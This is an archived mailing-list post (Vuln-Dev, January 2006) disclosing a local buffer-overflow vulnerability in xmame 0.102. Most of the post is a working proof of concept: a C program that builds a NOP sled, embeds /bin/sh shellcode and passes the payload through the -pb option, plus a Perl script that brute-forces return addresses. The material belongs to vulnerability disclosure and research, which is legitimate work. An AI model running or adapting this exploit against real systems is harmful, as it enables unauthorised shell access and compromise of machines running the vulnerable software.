Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Xmame 0.102 local vulnerability proof-of-concept

from [Rafael San Miguel Carrasco] Network Security [Permanent Link]
Subject: Xmame 0.102 local vulnerability proof-of-concept
Date: Tue, 31 Jan 2006 21:07:12 +0100

The following proof-of-concept demonstrates the existence of the local vulnerability found in xmame 0.102.
It uses the brute-force technique. The RET address interval works on Intel Debian GNU/Linux.
To test for the vulnerability, run "gcc exploit-c -o exploit" and then "perl fb.pl".

exploit.c:

#define NOP 0x90
#define TAMBUF 1200
#define INIC_SH 400
#include <stdlib.h>

int main (int argc, char **argv) {

   static char shellcode[]=
   "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
   "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
   "\x2f\x73\x68\x58";

   char buffer [TAMBUF + 1];
   char cadena [TAMBUF + 3];
   int cont;
   unsigned long ret = strtoul (argv[1], NULL, 16);

   for (cont = 0; cont < TAMBUF / 4; cont++)
       *( (long *) buffer + cont) = ret;

   for (cont = 0; cont < strlen (shellcode); cont++)
       buffer [cont + INIC_SH] = shellcode [cont];

   for (cont = 0; cont < INIC_SH; cont++)
       buffer [cont] = NOP;

   buffer [TAMBUF] = 0;
   printf ("RET = 0x%x\n", ret);
   strcpy (cadena, "AA");
   strcat (cadena, buffer);
   execl ("./xmame.x11", "./xmame.x11", "-pb", cadena, (char *) 0);
}

fb.pl:

#!/usr/bin/perl

$cnt = 0xbfffe000;

while (1) {
   $hex = sprintf ("0x%x", $cnt);
   $res = system ("./exploit $hex");
   printf "$hex : $res\n";
   $cnt += 4;
}

Greetings,

Rafael San Miguel Carrasco
Security Consultant
www.rafaelsanmiguel.com

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Xmame 0.102 local vulnerability proof-of-concept, Rafael San Miguel Carrasco <=
Previous by Date:  Nmap 4.00 Released, Fyodor
Next by Date:  [Full-disclosure] CME-24/BlackWorm email notifications + top-7 unreachable AS's, Gadi Evron
Previous by Thread:  Nmap 4.00 Released, Fyodor
Next by Thread:  [Full-disclosure] CME-24/BlackWorm email notifications + top-7 unreachable AS's, Gadi Evron
Indexes:  [Date] [Thread] [Top] [All Lists]